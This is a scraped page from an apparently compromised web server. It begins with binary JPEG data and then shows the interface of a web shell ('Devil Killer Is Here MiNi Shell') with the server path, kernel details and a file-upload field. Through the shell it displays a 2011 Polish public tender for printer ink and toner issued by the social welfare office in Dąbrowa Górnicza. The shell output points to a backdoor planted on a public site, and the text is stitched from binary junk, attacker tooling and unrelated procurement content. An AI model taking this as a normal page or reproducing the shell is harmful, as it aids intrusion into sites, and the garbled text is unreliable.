JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110504/99398-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Dostawa  materiałów drukujących  na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej oraz projektu systemowego  INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1  Rozwój i upowszechnianie aktywnej integracji, realizowany przez Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 99398 - 2011; data zamieszczenia: 04.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Skibińskiego 1, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2622528, faks 032 2613694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów drukujących  na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej oraz projektu systemowego  INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1  Rozwój i upowszechnianie aktywnej integracji, realizowany przez Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Dostawa  materiałów drukujących  na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej oraz projektu systemowego  INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1  Rozwój i upowszechnianie aktywnej integracji, realizowany przez Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej.
- zgodnie  z wymogami  określonymi  w niniejszej  Specyfikacji Istotnych Warunków Zamówienia  zwanej dalej SIWZ
1)  Przedmiot zamówienia  oraz ilość i szczegółowy rodzaj asortymentu   określono w kalkulacji cenowej zamówienia publicznego tj. załączniku Nr 4 i załączniku  Nr 4a, który stanowi integralną część niniejszej SIWZ oraz  w treści projektu umowy  (załącznik nr 7 do niniejszej SIWZ), tj.: 
a).  załączniku Nr 4 - asortyment na potrzeby Miejskiego Ośrodka Pomocy  Społecznej finansowany z własnych  środków budżetowych  MOPS,
b). załączniku Nr 4a - asortyment  na potrzeby projektu systemowego  INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1  Rozwój i upowszechnianie  aktywnej integracji,  realizowany przez Miejski  Ośrodek  Pomocy  Społecznej 
w Dąbrowie Górniczej.  
Załączniki Nr 4 i 4a stanowią integralną część niniejszej SIWZ.  
 ( W załączniku nr 4 i 4 a określa się  przedmiot  zamówienia  przez wskazanie wymagań funkcjonalnych , podając urządzenia  do których  mają  być zastosowane i z nimi kompatybilne  poszczególne rodzaje asortymentu materiałów drukujących).  
                                                         
2)  Wykonawca zagwarantuje dostawy  przedmiotu umowy  własnym środkiem transportu, z dostawą na miejsce  wskazane przez Zamawiającego, terminowo w dniu  i godzinie  uprzednio uzgodnionym  z właściwym   pracownikiem  MOPS, na własny koszt, zachowując  ceny ofertowe.  

3)   Dostarczony towar winien być  zapakowany oddzielnie asortymentowo  i opisany zgodnie z pozycjami kalkulacji tj. załącznik nr 4 i 4a  do niniejszej specyfikacji i umowy z podaniem terminu przydatności  do użycia  nie krótszym niż 12 miesięcy.

4)    Dostarczony  towar  niezgodny  z zapotrzebowaniem , wadliwy  lub przeterminowany  będzie zwracany. Nie dopuszcza się, aby kasety z tonerem były nieszczelne, na skutek czego zanieczyszczają urządzenia drukujące i kopiujące powodując ich uszkodzenie lub zniszczenie.
Wykonawca bierze na siebie  pełną odpowiedzialność  za uszkodzenie sprzętu spowodowane używaniem zaoferowanych materiałów. 

5) W przypadku uszkodzenia  urządzenia, którego przyczyną  będzie użycie dostarczonych materiałów  eksploatacyjnych , Wykonawca zobowiązany jest  do zwrotu kosztów naprawy urządzenia, a także w przypadku takiej konieczności, zwrotu kosztów zleconej przez Zamawiającego  ekspertyzy rzeczoznawcy.

6) Jeżeli w trakcie umowy  Zamawiający stwierdzi, że dostarczony  produkt nie jest kompatybilny  z urządzeniem do którego jest przeznaczony, ( urządzenie nie identyfikuje we właściwy sposób  stanu pojemności tonera lub tuszu), Wykonawca jest zobowiązany  wymienić towar na nowy współpracujący z urządzeniem drukującym ( kopiującym) bez zmiany ceny.

7)  Asortyment określony w niniejszym zamówieniu  może pochodzić od producenta sprzętu lub być porównywalny  ( nie gorszy ) pod względem jakości  i wydajności z fabrycznie nowymi. Oferowany towar winien być kompatybilny  ze sprzętem , do którego jest zamówiony o parametrach porównywalnych,  nie gorszych (pojemność tuszu, tonera, wydajność i jakość wydruku) w stosunku  do typu zamawianego  produktu  fabrycznie nowego, a ich  zastosowanie nie może  spowodować utraty gwarancji producenta sprzętu.
Asortyment nie gorszy lub równoważny oznacza , asortyment ( zamienny , regenerowany itp.) , którego parametry fizyczne , techniczne, funkcjonalne i użytkowe ( np.  pojemność, wydajność, jakość  druku  itp.) są nie gorsze od materiałów   wskazanych w złączniku Nr 4 i Nr 4a do niniejszej SIWZ. Działają analogicznie ( nie gorzej)  jak materiały oryginalne producenta urządzeń.
Poszczególny asortyment  winien być  umieszczony w  opakowaniach z etykietami , posiadać znak firmowy producenta , etykiety winny zawierać numer katalogowy, termin ważności i listę kompatybilności z urządzeniami wyszczególnonymi w załaczniku nr 4 i Nr 4a.
Zamawiający opisał przedmiot zamówienia  przez wskazanie wymagań funkcjonalnych , podając w załączniku nr 4  i 4a typy materiałów -  eksploatacyjnych i urządzenia  do których  mają być  poszczególne asortymenty zastosowane i z nimi kompatybilne , czyli zgodne, mogące  współistnieć bez szkody  dla każdej ze strony.
We wszystkich przypadkach, gdzie w opisie  przedmiotu zamówienia niniejszej SIWZ użyte są znaki towarowe , patenty lub pochodzenie , to przyjmuje się,że wskazaniom takim  towarzyszą wyrazy równoważne tj. spełniające taką samą funkcję użytkową  oraz minimalne wymagania  techniczne  o parametrach  nie gorszych  niż wskazane  w SIWZ.

8)    I część dostawy nastąpi  po zawarciu umowy w ciągu  7 dni  kalendarzowych od daty otrzymania od Zamawiającego szczegółowego wykazu asortymentu.    

9)   W okresie trwania umowy określonego w rozdziale V niniejszej SIWZ  kolejne dostawy będą realizowane na podstawie zgłaszanych zapotrzebowań określających rodzaj asortymentu i ilość- faxem lub pisemnie , z tygodniowym wyprzedzeniem.

10)  Podane w załączniku Nr 4 i Nr 4a  do SIWZ  ilości materiałów eksploatacyjnych  są wielkościami  orientacyjnymi , oszacowanymi  na podstawie zużycia  w roku poprzednim  oraz zapotrzebowania orientacyjnego na bieżący rok. Są więc wielkościami informacyjnymi. Zamawiający  w zależności od swoich potrzeb  może w okresie  obowiązywania umowy  zamówić inne ilości materiałów eksploatacyjnych  w ramach wartości i asortymentu  wynikającego z oferty, co nie będzie stanowiło  podstawy do zmiany cen jednostkowych.  Zamawiający zastrzega sobie  prawo do rezygnacji lub zmiany  poszczególnego asortymentu wyszczególnionego w załączniku nr 4 i 4a  tj. Kalkulacji cenowej w ramach ceny ofertowej  w każdym czasie trwania umowy.

11) Wykonawca  za dostarczony  towar będzie wystawiał oddzielne faktury w części dotyczącej MOPS (załącznik 4) i oddzielne w części dotyczącej projektu INTEGRA ( załącznik 4a).

12)  Zamawiający zastrzega sobie  prawo do rezygnacji lub zmiany  poszczególnego asortymentu wyszczególnionego w załączniku nr 4 i 4a tj. Kalkulacji cenowej w ramach ceny ofertowej  w każdym czasie trwania umowy.

13)    Oferty niezawierające  pełnego zakresu  przedmiotu zamówienia określonego w załączniku Nr 4 i Nr 4a zostaną odrzucone.

14) Asortyment na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej finansowany ze środków własnych
Tusz do drukarki HP DeskJet 5150 czarny. Nie gorszy niż: Wydajność 450 stron A-4 przy pokryciu 5%. Pojemność 19 ml - 38szt.
Tusz do drukarki HP DeskJet 5150 kolor. Nie gorszy niż: Wydajność 400 stron A-4 przy pokryciu 5%. Pojemność 17 ml - 11szt.
Tusz do drukarki HP DeskJet 5940 czarny. Nie gorszy niż: Wydajność 800 stron A-4 przy pokryciu 5%. Pojemność 25 ml - 40szt.
Tusz do drukarki HP DeskJet 5940 kolor. Nie gorszy niż: Wydajność 450 stron A-4 przy pokryciu 5%. Pojemność 14 ml - 14szt.
Tusz do drukarki HP DeskJet 6940 czarny. Nie gorszy niż: Wydajność 800 stron A-4 przy pokryciu 5%. Pojemność 25 ml - 48szt.
Tusz do drukarki HP DeskJet 6940 kolor. Nie gorszy niż: Wydajność 450 stron A-4 przy pokryciu 5%. Pojemność 14 ml - 13szt.
Tusz do drukarki HP DeskJet 6980 czarny. Nie gorszy niż: Wydajność 800 stron A-4 przy pokryciu 5%. Pojemność 25 ml - 6szt.
Tusz do drukarki HP DeskJet 6980 kolor. Nie gorszy niż: Wydajność 450 stron A-4 przy pokryciu 5%. Pojemność 14 ml - 3szt.
Tusz do drukarki HP DeskJet 840C czarny. Nie gorszy niż: Wydajność 495 stron A-4 przy pokryciu 5%. Pojemność 42 ml - 3szt.
Tusz do drukarki HP DeskJet 840C kolor. Nie gorszy niż: Wydajność 430 stron A-4 przy pokryciu 5%. Pojemność 24 ml - 2szt.
Tusz do drukarki HP DeskJet F4180 czarny. Nie gorszy niż: Wydajność 600 stron A-4 przy pokryciu 5%. Pojemność 20 mm - 11szt.
Tusz do drukarki HP DeskJet F4180 kolor. Nie gorszy niż: Wydajność 400 stron A-4 przy pokryciu 5%. Pojemność 17 ml - 2szt.
Toner do urządzenia wielofunkcyjnego HP LaserJet 1015. Nie gorszy niż: Wydajność 2500 stron A-4 przy pokryciu 5% - 6szt.
Toner do urządzenia wielofunkcyjnego HP LaserJet 1100. Nie gorszy niż: Wydajność 3500 stron A-4 przy pokryciu 5% - 5szt.
Toner do urządzenia wielofunkcyjnego HP LaserJet 1200. Nie gorszy niż: Wydajność 3200 stron A-4 przy pokryciu 5% - 2szt.
Toner do urządzenia wielofunkcyjnego HP LaserJet 3020. Nie gorszy niż: Wydajność 2500 stron A-4 przy pokryciu 5% - 43szt.
Toner do urządzenia wielofunkcyjnego HP LaserJet 3052. Nie gorszy niż: Wydajność 2500 stron A-4 przy pokryciu 5% - 14szt.
Toner do urządzenia wielofunkcyjnego HP LaserJet M2727nf.  Nie gorszy niż: Wydajność 7000 stron A-4 przy pokryciu 5% - 10szt.
Toner do urządzenia wielofunkcyjnego HP LaserJet P2015. Nie gorszy niż: Wydajność 3000 stron A-4 przy pokryciu 5% - 5szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG ML-2250. Nie gorszy niż: Wydajność 5000 stron A-4 przy pokryciu 5% - 4szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG ML-2850. Nie gorszy niż: Wydajność 5000 stron A-4 przy pokryciu 5% - 7szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG ML-2851ND. Nie gorszy niż: Wydajność 5000 stron A-4 przy pokryciu 5% - 12szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG SCX-4720FN. Nie gorszy niż: Wydajność 4000 stron A-4 przy pokryciu 5% - 50szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG SCX-4824FN. Nie gorszy niż: Wydajność 2000 stron A-4 przy pokryciu 5% - 11szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG 6200ND black. Nie gorszy niż: Wydajność 5500 stron A-4 przy pokryciu 5% - 29szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG 6200ND cyan.  Nie gorszy niż: Wydajność 5000 stron A-4 przy pokryciu 5% - 10szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG 6200ND magenta.  Nie gorszy niż: Wydajność 5000 stron A-4 przy pokryciu 5% -10szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG 6200ND yellow.  Nie gorszy niż: Wydajność 5000 stron A-4 przy pokryciu 5% - 10szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310 black. Nie gorszy niż: Wydajność 1500 stron A-4 przy pokryciu 5% - 2szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310cyan. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 2szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310 magenta. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 2szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310 yellow. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 2szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310C black. Nie gorszy niż: Wydajność 1500 stron A-4 przy pokryciu 5% - 4szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310C cyan. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 1szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310C magenta. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 1szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310C yellow. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 1szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310N black. Nie gorszy niż: Wydajność 1500 stron A-4 przy pokryciu 5% - 6szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310N cyan. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 3szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310N magenta. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 3szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310N yellow. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 3szt.
Toner do urządzenia wielofunkcyjnego Panasonic KX MB 773. Nie gorszy niż: Wydajność 2000 stron A-4 przy pokryciu 5% - 7szt.
Toner do urządzenia wielofunkcyjnego Panasonic KX MB 783. Nie gorszy niż: Wydajność 2000 stron A-4 przy pokryciu 5% - 13szt.
Toner do urządzenia wielofunkcyjnego Panasonic KX MB 2025. Nie gorszy niż: Wydajność 2000 stron A-4 przy pokryciu 5% - 3szt.
Toner do Panasonic KX-FL 613 laser. Nie gorszy niż: Wydajność 2500 stron A-4 przy pokryciu 5% -1szt.
Toner do Panasonic KX-FT906PD. Nie gorszy niż: Wydajność 2000 stron A-4 przy pokryciu 5% - 1szt.
Toner do Panasonic KX-FL 513. Nie gorszy niż: Wydajność 2000 stron A-4 przy pokryciu 5% - 2szt.
Toner do CANON JX 510P. Nie gorszy niż: Wydajność 2000 stron A-4 przy pokryciu 5% - 5szt.
Toner do Kyocera FS-1118MFP. Nie gorszy niż: Wydajność 7200 stron A-4 przy pokryciu 5% - 10szt.
Toner do kserokopiarki Kyocera KM 1620. Nie gorszy niż: Wydajność 15000 stron A-4 przy pokryciu 5% - 12szt.
Toner do kserokopiarki Kyocera KM 1500. Nie gorszy niż: Wydajność 15000 stron A-4 przy pokryciu 5% - 2szt.
Toner do Philips Laser fax 925. Nie gorszy niż: Wydajność 2400 stron A-4 przy pokryciu 5% - 2 szt.
Toner do urządzenia Brother 7820N. Nie gorszy niż: Wydajność 2500 stron A-4 przy pokryciu 5% - 2 szt.
Toner do Ricoh Aficio 2022. Nie gorszy niż: Wydajność 11000 stron A-4 przy pokryciu 5% - 2szt.
Toner do UTAX CD 1216. Nie gorszy niż: Wydajność 15000 stron A-4 przy pokryciu 5% - 3szt.
Toner do UTAX CD 1028. Nie gorszy niż: Wydajność 15000 stron A-4 przy pokryciu 5% - 3szt.

15) Asortyment na potrzeby projektu systemowego  INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1  Rozwój i upowszechnianie aktywnej integracji, realizowanego przez Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej.  
Tusz do drukarki HP DeskJet 6980 czarny. Nie gorszy niż: Wydajność 800 stron A-4 przy pokryciu 5%. Pojemność 25 ml - 12szt.
Tusz do drukarki HP DeskJet 6980 kolor. Nie gorszy niż: Wydajność 450 stron A-4 przy pokryciu 5%. Pojemność 14 ml - 11szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310N black. Nie gorszy niż: Wydajność 1500 stron A -4 przy pokryciu 5% - 2szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310N cyan. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 2szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310N magenta. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 2szt.
Toner do urządzenia wielofunkcyjnego SAMSUNG CLP 310N yellow. Nie gorszy niż: Wydajność 1000 stron A-4 przy pokryciu 5% - 2szt.
Toner do kserokopiarki Kyocera KM-2550. Nie gorszy niż: Wydajność 15000 stron A-4 przy pokryciu 5% - 6szt
Toner do urządzenia wielofunkcyjnego Kyocera FS-1118 MFP. Nie gorszy niż: Wydajność 7200 stron A-4 przy pokryciu 5% - 11szt.
UWAGA :
W cenie towaru należy ująć koszty transportu i dostawę towaru do siedziby Zamawiającego na wskazane miejsce.
Wszelkie nazwy umieszczone w zamówieniu należy traktować jako wzorcowe, określające towary o podobnej, nie gorszej jakości.
Asortyment nie gorszy lub równoważny oznacza , asortyment ( zamienny , regenerowany itp.) , którego parametry fizyczne , techniczne, funkcjonalne i użytkowe ( np.  pojemność, wydajność, jakość  druku  itp.) są nie gorsze od materiałów   wskazanych w złączniku Nr 4 i Nr 4a do niniejszej SIWZ. Działają analogicznie ( nie gorzej)  jak materiały oryginalne producenta urządzeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 22.60.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa i nie dokonuje oceny warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawcy wykażą, że w okresie ostatnich trzech lat  przed upływem  terminu składania  ofert albo wniosków o dopuszczenie do udziału  w postępowaniu , a jeżeli  okres prowadzenia działalności jest krótszy -  w tym okresie  nastąpi, jeżeli  należycie wykonali  co najmniej  jedną dostawę materiałów drukujących  , o wartości  nie mniejszej  niż 60000,00 zł   oraz załączą  dokument  potwierdzający , że dostawa  ta została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa i nie dokonuje oceny warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa i nie dokonuje oceny warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa i nie dokonuje oceny warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

